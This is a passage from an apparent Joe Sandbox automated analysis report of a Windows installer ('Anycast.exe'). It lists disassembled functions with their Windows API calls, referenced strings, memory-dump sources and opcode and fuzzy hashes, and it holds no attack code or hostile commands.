                                                                                                                                • Part of subcall function 00405D91: CharNextW.USER32(?,?,C:\,?,00405E05,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                                                                                • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                                                                                • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                                                                              • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E47
                                                                                                                              • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405E57
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                              • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 3248276644-1964270705
                                                                                                                              • Opcode ID: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                                                                              • Instruction ID: 87735b5e832f2f8e04389b482ed260ad6458a913df04a2d72dce2697f876d431
                                                                                                                              • Opcode Fuzzy Hash: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                                                                              • Instruction Fuzzy Hash: A5F0F435104D2216C63233369D09AAF1548CE82364759453BF8D1B22D1DB3C8B838CED
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405F36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00405F54
                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00440000,004034C3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F), ref: 00405F6F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                              • API String ID: 1716503409-44229769
                                                                                                                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                              • Instruction ID: 6280ba3094977af7574bcd42248b285f756f81412eced5037130b5adcb3d4edb
                                                                                                                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                              • Instruction Fuzzy Hash: 55F03676B00204BFDB10CF55DD05E9FB7ADEB95750F10803AEE44F7150E6B499548B58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004062DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Remove folder: ,?,?,0040656E,80000002), ref: 00406325
                                                                                                                              • RegCloseKey.KERNELBASE(?,?,0040656E,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\), ref: 00406330
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseQueryValue
                                                                                                                              • String ID: Remove folder:
                                                                                                                              • API String ID: 3356406503-1958208860
                                                                                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                              • Instruction ID: 844154995e22508991f9c2085a3ddc533437a0a8a5a4e2329c4a16b7f523fd8f
                                                                                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                              • Instruction Fuzzy Hash: CF017172500209EBDF218F55CD05EDB3BA9EB54394F05803AFD5592150E738D964DBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004059FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A30
                                                                                                                              Strings
                                                                                                                              • Error launching installer, xrefs: 00405A0D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                              • String ID: Error launching installer
                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                              • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                                                              • Instruction ID: 9b609aa4dbda1b40da6c9694c56aee9f908f129f2491f8ac19b90d9f5f8e4f4b
                                                                                                                              • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                                                              • Instruction Fuzzy Hash: 19E0B6B4600209BFEB109FA4EE49F7B7AACEB04708F004565BD50F6191DBB8EC158A7C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403A4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FreeLibrary.KERNELBASE(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403A23,00403839,00000007,?,00000007,00000009,0000000B), ref: 00403A65
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403A6C
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A4B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 1100898210-823278215
                                                                                                                              • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                              • Instruction ID: 631b6d606f958dd3b9f901d17eba749f6bbdc97bd5f3e27fdad90cb16f3fbd8e
                                                                                                                              • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                              • Instruction Fuzzy Hash: 1CE0EC3261212097C7219F55BE08B6E7768AF48B22F06146AE9C5BB2608B745D424FD8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                                                                                                • Part of subcall function 00405479: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                                • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                                • Part of subcall function 00405479: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,004033B0), ref: 004054D4
                                                                                                                                • Part of subcall function 00405479: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\), ref: 004054E6
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 334405425-0
                                                                                                                              • Opcode ID: d36c9fe9f5930fea64fbdd9db72136e738f9ce38e1766e8381d205f98b75c4d4
                                                                                                                              • Instruction ID: ec066b6349dd7fa10fed5d852794e64c7c96c86c32cb5d354c2886168094fa20
                                                                                                                              • Opcode Fuzzy Hash: d36c9fe9f5930fea64fbdd9db72136e738f9ce38e1766e8381d205f98b75c4d4
                                                                                                                              • Instruction Fuzzy Hash: A7219931500104EBCF10AFA5CE49A9E7A71AF44354F34413BF515B51E0CBBD9D829A1D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFree
                                                                                                                              • String ID: "C:\Program Files (x86)\Anycast\Anycast.exe"
                                                                                                                              • API String ID: 3394109436-2329287405
                                                                                                                              • Opcode ID: 4383e1821223700f4b133503293de29e2a13c39d75fa2c482cb387c5310dcd0f
                                                                                                                              • Instruction ID: bf14f8cf48d280ad10deff957409e7ec0fbe11b3568df8ef6b08dac15d949b91
                                                                                                                              • Opcode Fuzzy Hash: 4383e1821223700f4b133503293de29e2a13c39d75fa2c482cb387c5310dcd0f
                                                                                                                              • Instruction Fuzzy Hash: 5221A872600114DBD720AF94CE85E5A73B4BB04718725053BFA52F72D0D7BCAC508BAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402482 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(0040B5F0,00000023,00000011,00000002), ref: 004024CD
                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5F0,00000000,00000011,00000002), ref: 0040250D
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2655323295-0
                                                                                                                              • Opcode ID: 503b3e322e303467f85f210d0fb21fb6b8f48cd8f21f7ae3b7e06566ceac78da
                                                                                                                              • Instruction ID: 7edbd774ff12736b5c68cca40ff53a8b2e2340a941a441eef078c8e93cf21856
                                                                                                                              • Opcode Fuzzy Hash: 503b3e322e303467f85f210d0fb21fb6b8f48cd8f21f7ae3b7e06566ceac78da
                                                                                                                              • Instruction Fuzzy Hash: 1C11AF71E00108BEDB00AFA5CE49AAEBBB8EF44314F20443AF504B71D1D7B89D409A68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405ADB Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405EE2: GetFileAttributesW.KERNELBASE(?,?,00405AE7,?,?,00000000,00405CBD,?,?,?,?), ref: 00405EE7
                                                                                                                                • Part of subcall function 00405EE2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405EFB
                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405CBD), ref: 00405AF6
                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405CBD), ref: 00405AFE
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B16
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1655745494-0
                                                                                                                              • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                              • Instruction ID: 7e5b8568f5e1827fb47b680563aec1ca45d622ef9644398f98c88bac322b3e2d
                                                                                                                              • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                              • Instruction Fuzzy Hash: 1FE0E531219A505AC250A7708D0CB5F3DE8EFC6314F04093AF891B10D4D778A806CA6D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404340 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000408,?,00000000,00403F9C), ref: 0040435E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: x
                                                                                                                              • API String ID: 3850602802-2363233923
                                                                                                                              • Opcode ID: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                                                                                                                              • Instruction ID: 77fea948b7ca7f35d6f9539b3bd28cfc28d4d18c6dceafe2a71224d28f690d2d
                                                                                                                              • Opcode Fuzzy Hash: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                                                                                                                              • Instruction Fuzzy Hash: 0AC01272240200EACB004B40DE01B4A7A20B7E0B02F20A039F781210B0C6706422DB0C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405D91: CharNextW.USER32(?,?,C:\,?,00405E05,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                                                                                • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                                                                                • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
